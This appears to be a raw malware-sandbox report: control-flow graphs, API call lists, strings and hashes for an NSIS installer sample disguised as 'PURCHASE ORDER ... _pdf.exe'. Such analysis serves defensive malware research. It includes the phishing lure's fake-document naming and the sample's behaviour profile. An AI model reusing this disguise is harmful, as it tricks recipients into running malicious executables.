4590->4595 4592 404b2b 4592->4569 4593->4586 4594->4588 4595->4592 4596 40242a 4607 402cc9 4596->4607 4598 402434 4599 402bbf 18 API calls 4598->4599 4600 40243d 4599->4600 4601 402448 RegQueryValueExW 4600->4601 4602 40281e 4600->4602 4603 402468 4601->4603 4606 40246e RegCloseKey 4601->4606 4603->4606 4611 405f9c wsprintfW 4603->4611 4606->4602 4608 402bbf 18 API calls 4607->4608 4609 402ce2 4608->4609 4610 402cf0 RegOpenKeyExW 4609->4610 4610->4598 4611->4606 5278 40422d lstrcpynW lstrlenW 5279 40172d 5280 402bbf 18 API calls 5279->5280 5281 401734 SearchPathW 5280->5281 5282 40174f 5281->5282 4612 404b30 GetDlgItem GetDlgItem 4613 404b82 7 API calls 4612->4613 4616 404d9b 4612->4616 4614 404c25 DeleteObject 4613->4614 4615 404c18 SendMessageW 4613->4615 4617 404c2e 4614->4617 4615->4614 4622 404e60 4616->4622 4626 404e7f 4616->4626 4629 404dfb 4616->4629 4618 404c3d 4617->4618 4619 404c65 4617->4619 4621 406077 18 API calls 4618->4621 4623 404119 19 API calls 4619->4623 4620 404f2b 4627 404f35 SendMessageW 4620->4627 4634 404f3d 4620->4634 4628 404c47 SendMessageW SendMessageW 4621->4628 4622->4626 4633 404e71 SendMessageW 4622->4633 4624 404c79 4623->4624 4630 404119 19 API calls 4624->4630 4625 405113 4632 404180 8 API calls 4625->4632 4626->4620 4626->4625 4631 404ed8 SendMessageW 4626->4631 4627->4634 4628->4617 4635 404a7e 5 API calls 4629->4635 4648 404c87 4630->4648 4631->4625 4637 404eed SendMessageW 4631->4637 4638 405121 4632->4638 4633->4626 4639 404f56 4634->4639 4640 404f4f ImageList_Destroy 4634->4640 4644 404f66 4634->4644 4647 404e0c 4635->4647 4636 4050d5 4636->4625 4645 4050e7 ShowWindow GetDlgItem ShowWindow 4636->4645 4643 404f00 4637->4643 4641 404f5f GlobalFree 4639->4641 4639->4644 4640->4639 4641->4644 4642 404d5c GetWindowLongW SetWindowLongW 4646 404d75 4642->4646 4653 404f11 SendMessageW 4643->4653 4644->4636 4659 404afe 4 API calls 4644->4659 4662 404fa1 4644->4662 4645->4625 4649 404d93 4646->4649 4650 404d7b ShowWindow 4646->4650 4647->4622 4648->4642 4652 404cd7 SendMessageW 4648->4652 4654 404d56 4648->4654 4657 404d13 SendMessageW 4648->4657 4658 404d24 SendMessageW 4648->4658 4669 40414e SendMessageW 4649->4669 4668 40414e SendMessageW 4650->4668 4652->4648 4653->4620 4654->4642 4654->4646 4656 404d8e 4656->4625 4657->4648 4658->4648 4659->4662 4660 4050ab InvalidateRect 4660->4636 4661 4050c1 4660->4661 4670 404a39 4661->4670 4663 404fcf SendMessageW 4662->4663 4664 404fe5 4662->4664 4663->4664 4664->4660 4665 405046 4664->4665 4667 405059 SendMessageW SendMessageW 4664->4667 4665->4667 4667->4664 4668->4656 4669->4616 4673 404970 4670->4673 4672 404a4e 4672->4636 4674 404989 4673->4674 4675 406077 18 API calls 4674->4675 4676 4049ed 4675->4676 4677 406077 18 API calls 4676->4677 4678 4049f8 4677->4678 4679 406077 18 API calls 4678->4679 4680 404a0e lstrlenW wsprintfW SetDlgItemTextW 4679->4680 4680->4672 5283 4045b4 5284 4045e0 5283->5284 5285 4045f1 5283->5285 5344 40577e GetDlgItemTextW 5284->5344 5287 4045fd GetDlgItem 5285->5287 5288 40465c 5285->5288 5291 404611 5287->5291 5289 404740 5288->5289 5298 406077 18 API calls 5288->5298 5342 4048ef 5288->5342 5289->5342 5346 40577e GetDlgItemTextW 5289->5346 5290 4045eb 5292 4062e9 5 API calls 5290->5292 5293 404625 SetWindowTextW 5291->5293 5296 405ab4 4 API calls 5291->5296 5292->5285 5297 404119 19 API calls 5293->5297 5295 404180 8 API calls 5300 404903 5295->5300 5301 40461b 5296->5301 5302 404641 5297->5302 5303 4046d0 SHBrowseForFolderW 5298->5303 5299 404770 5304 405b11 18 API calls 5299->5304 5301->5293 5308 405a09 3 API calls 5301->5308 5305 404119 19 API calls 5302->5305 5303->5289 5306 4046e8 CoTaskMemFree 5303->5306 5307 404776 5304->5307 5309 40464f 5305->5309 5310 405a09 3 API calls 5306->5310 5347 406055 lstrcpynW 5307->5347 5308->5293 5345 40414e SendMessageW 5309->5345 5317 4046f5 5310->5317 5313 404655 5316 40642b 5 API calls 5313->5316 5314 40472c SetDlgItemTextW 5314->5289 5315 40478d 5318 40642b 5 API calls 5315->5318 5316->5288 5317->5314 5319 406077 18 API calls 5317->5319 5325 404794 5318->5325 5321 404714 lstrcmpiW 5319->5321 5320 4047d5 5348 406055 lstrcpynW 5320->5348 5321->5314 5322 404725 lstrcatW 5321->5322 5322->5314 5324 4047dc 5326 405ab4 4 API calls 5324->5326 5325->5320 5330 405a55 2 API calls 5325->5330 5331 40482d 5325->5331 5327 4047e2 GetDiskFreeSpaceW 5326->5327 5329 404806 MulDiv 5327->5329 5327->5331 5329->5331 5330->5325 5332 40489e 5331->5332 5334 404a39 21 API calls 5331->5334 5333 4048c1 5332->5333 5335 40140b 2 API calls 5332->5335 5349 40413b EnableWindow 5333->5349 5336 40488b 5334->5336 5335->5333 5338 4048a0 SetDlgItemTextW 5336->5338 5339 404890 5336->5339 5338->5332 5341 404970 21 API calls 5339->5341 5340 4048dd 5340->5342 5350 404549 5340->5350 5341->5332 5342->5295 5344->5290 5345->5313 5346->5299 5347->5315 5348->5324 5349->5340 5351 404557 5350->5351 5352 40455c SendMessageW 5350->5352 5351->5352 5352->5342 5353 4027b4 5354 4027ba 5353->5354 5355 4027c2 FindClose 5354->5355 5356 402a4c 5354->5356 5355->5356 5357 4042b6 5358 4042ce 5357->5358 5362 4043e8 5357->5362 5363 404119 19 API calls 5358->5363 5359 404452 5360 404524 5359->5360 5361 40445c GetDlgItem 5359->5361 5368 404180 8 API calls 5360->5368 5364 4044e5 5361->5364 5365 404476 5361->5365 5362->5359 5362->5360 5366 404423 GetDlgItem SendMessageW 5362->5366 5367 404335 5363->5367 5364->5360 5373 4044f7 5364->5373 5365->5364 5372 40449c 6 API calls 5365->5372 5388 40413b EnableWindow 5366->5388 5370 404119 19 API calls 5367->5370 5371 40451f 5368->5371 5375 404342 CheckDlgButton 5370->5375 5372->5364 5376 40450d 5373->5376 5377 4044fd SendMessageW 5373->5377 5374 40444d 5379 404549 SendMessageW 5374->5379 5386 40413b EnableWindow 5375->5386 5376->5371 5378 404513 SendMessageW 5376->5378 5377->5376 5378->5371 5379->5359 5381 404360 GetDlgItem 5387 40414e SendMessageW 5381->5387 5383 404376 SendMessageW 5384 404393 GetSysColor 5383->5384 5385 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5383->5385 5384->5385 5385->5371 5386->5381 5387->5383 5388->5374 5389 401b37 5390 401b88 5389->5390 5392 401b44 5389->5392 5393 401bb2 GlobalAlloc 5390->5393 5394 401b8d 5390->5394 5391 401bcd 5395 406077 18 API calls 5391->5395 5404 402288 5391->5404 5392->5391 5397 401b5b 5392->5397 5396 406077 18 API calls 5393->5396 5394->5404 5410 406055 lstrcpynW 5394->5410 5399 402282 5395->5399 5396->5391 5408 406055 lstrcpynW 5397->5408 5402 40579a MessageBoxIndirectW 5399->5402 5401 401b9f GlobalFree 5401->5404 5402->5404 5403 401b6a 5409 406055 lstrcpynW 5403->5409 5406 401b79 5411 406055 lstrcpynW 5406->5411 5408->5403 5409->5406 5410->5401 5411->5404 5412 402537 5413 402562 5412->5413 5414 40254b 5412->5414 5416 402596 5413->5416 5417 402567 5413->5417 5415 402ba2 18 API calls 5414->5415 5424 402552 5415->5424 5419 402bbf 18 API calls 5416->5419 5418 402bbf 18 API calls 5417->5418 5421 40256e WideCharToMultiByte lstrlenA 5418->5421 5420 40259d lstrlenW 5419->5420 5420->5424 5421->5424 5422 4025ca 5423 4025e0 5422->5423 5425 405cdc WriteFile 5422->5425 5424->5422 5424->5423 5426 405d0b 5 API calls 5424->5426 5425->5423 5426->5422 5427 4014b8 5428 4014be 5427->5428 5429 401389 2 API calls 5428->5429 5430 4014c6 5429->5430 4709 4015b9 4710 402bbf 18 API calls 4709->4710 4711 4015c0 4710->4711 4712 405ab4 4 API calls 4711->4712 4724 4015c9 4712->4724 4713 401629 4715 40165b 4713->4715 4716 40162e 4713->4716 4714 405a36 CharNextW 4714->4724 4719 401423 25 API calls 4715->4719 4717 401423 25 API calls 4716->4717 4718 401635 4717->4718 4728 406055 lstrcpynW 4718->4728 4726 401653 4719->4726 4721 405700 2 API calls 4721->4724 4722 40571d 5 API calls 4722->4724 4723 401642 SetCurrentDirectoryW 4723->4726 4724->4713 4724->4714 4724->4721 4724->4722 4725 40160f GetFileAttributesW 4724->4725 4727 405683 4 API calls 4724->4727 4725->4724 4727->4724 4728->4723 5431 10002a7f 5432 10002a97 5431->5432 5433 1000158f 2 API calls 5432->5433 5434 10002ab2 5433->5434

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 32 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->32 33 403526-403540 DeleteFileW call 402dee 25->33 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 34 403480-40348d call 405a36 31->34 35 4033c8-4033ce 31->35 32->33 50 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 32->50 53 4035f1-403602 call 4037c4 OleUninitialize 33->53 54 403546-40354c 33->54 51 403491-403497 34->51 52 40348f-403490 34->52 36 4033d0-4033d7 35->36 37 4033e8-403421 35->37 41 4033d9-4033dc 36->41 42 4033de 36->42 43 403423-403428 37->43 44 40343e-403478 37->44 41->37 41->42 42->37 43->44 48 40342a-403432 43->48 44->34 49 40347a-40347e 44->49 58 403434-403437 48->58 59 403439 48->59 49->34 60 40349f-4034ad call 406055 49->60 50->33 50->53 51->24 62 40349d 51->62 52->51 71 403728-40372e 53->71 72 403608-403618 call 40579a ExitProcess 53->72 55 4035e1-4035e8 call 40389e 54->55 56 403552-40355d call 405a36 54->56 70 4035ed 55->70 73 4035ab-4035b5 56->73 74 40355f-403594 56->74 58->44 58->59 59->44 63 4034b2 60->63 62->63 63->25 70->53 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 86 4035a3-4035a7 78->86 87 40359c-4035a1 78->87 79->80 81->53 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 86->78 92 4035a9 86->92 87->86 87->92 92->73 95->77 100 4037a5-4037a7 call 40140b 95->100 96->95 96->100 97->55 98->99 99->53 102 40365b-40365e 99->102 100->77 103 403660-403665 call 405683 102->103 104 403667 call 405700 102->104 113 40366c-40367a SetCurrentDirectoryW 103->113 104->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 124 40371c-403723 call 405ef6 122->124 123->122 125 4036e5-403705 call 405ef6 call 406077 call 405735 123->125 124->53 125->122 134 403707-40370e CloseHandle 125->134 134->122
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                                    • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                    • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",00000000), ref: 00403363
                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",00000020), ref: 0040338A
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",00000000,?), ref: 0040362B
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",00000000,?), ref: 0040363A
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",00000000,?), ref: 00403645
                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe",00000000,?), ref: 00403651
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                                    • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,0042AA28,?), ref: 004036DB
                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3586999533-622675497
                                                                                                                                    • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                    • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                    • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                    • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 148 404eb3-404eba 144->148 151 404de4-404deb 145->151 152 404dd7-404dde 145->152 149 404c40-404c5d call 406077 SendMessageW * 2 146->149 150 404c3d 146->150 147->143 153 404c65-404c91 call 404119 * 2 147->153 154 404f2b-404f33 148->154 155 404ebc-404ec2 148->155 149->147 150->149 157 404e60-404e63 151->157 158 404ded-404df0 151->158 152->148 152->151 189 404c97-404c9d 153->189 190 404d5c-404d6f GetWindowLongW SetWindowLongW 153->190 164 404f35-404f3b SendMessageW 154->164 165 404f3d-404f44 154->165 161 405113-405125 call 404180 155->161 162 404ec8-404ed2 155->162 157->148 163 404e65-404e6f 157->163 167 404df2-404df9 158->167 168 404dfb-404e10 call 404a7e 158->168 162->161 170 404ed8-404ee7 SendMessageW 162->170 172 404e71-404e7d SendMessageW 163->172 173 404e7f-404e89 163->173 164->165 174 404f46-404f4d 165->174 175 404f78-404f7f 165->175 167->157 167->168 168->157 186 404e12-404e23 168->186 170->161 181 404eed-404efe SendMessageW 170->181 172->173 173->148 183 404e8b-404e95 173->183 184 404f56-404f5d 174->184 185 404f4f-404f50 ImageList_Destroy 174->185 179 4050d5-4050dc 175->179 180 404f85-404f91 call 4011ef 175->180 179->161 194 4050de-4050e5 179->194 207 404fa1-404fa4 180->207 208 404f93-404f96 180->208 192 404f00-404f06 181->192 193 404f08-404f0a 181->193 195 404ea6-404eb0 183->195 196 404e97-404ea4 183->196 187 404f66-404f72 184->187 188 404f5f-404f60 GlobalFree 184->188 185->184 186->157 197 404e25-404e27 186->197 187->175 188->187 198 404ca0-404ca7 189->198 202 404d75-404d79 190->202 192->193 200 404f0b-404f24 call 401299 SendMessageW 192->200 193->200 194->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 194->201 195->148 196->148 203 404e29-404e30 197->203 204 404e3a 197->204 205 404d3d-404d50 198->205 206 404cad-404cd5 198->206 200->154 201->161 210 404d93-404d9b call 40414e 202->210 211 404d7b-404d8e ShowWindow call 40414e 202->211 213 404e32-404e34 203->213 214 404e36-404e38 203->214 217 404e3d-404e59 call 40117d 204->217 205->198 221 404d56-404d5a 205->221 215 404cd7-404d0d SendMessageW 206->215 216 404d0f-404d11 206->216 222 404fe5-405009 call 4011ef 207->222 223 404fa6-404fbf call 4012e2 call 401299 207->223 218 404f98 208->218 219 404f99-404f9c call 404afe 208->219 210->137 211->161 213->217 214->217 215->205 228 404d13-404d22 SendMessageW 216->228 229 404d24-404d3a SendMessageW 216->229 217->157 218->219 219->207 221->190 221->202 236 4050ab-4050bf InvalidateRect 222->236 237 40500f 222->237 242 404fc1-404fc7 223->242 243 404fcf-404fde SendMessageW 223->243 228->205 229->205 236->179 240 4050c1-4050d0 call 404a51 call 404a39 236->240 241 405012-40501d 237->241 240->179 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->222 244->236 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 004050B1
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                    • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                    • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                    • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                    • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 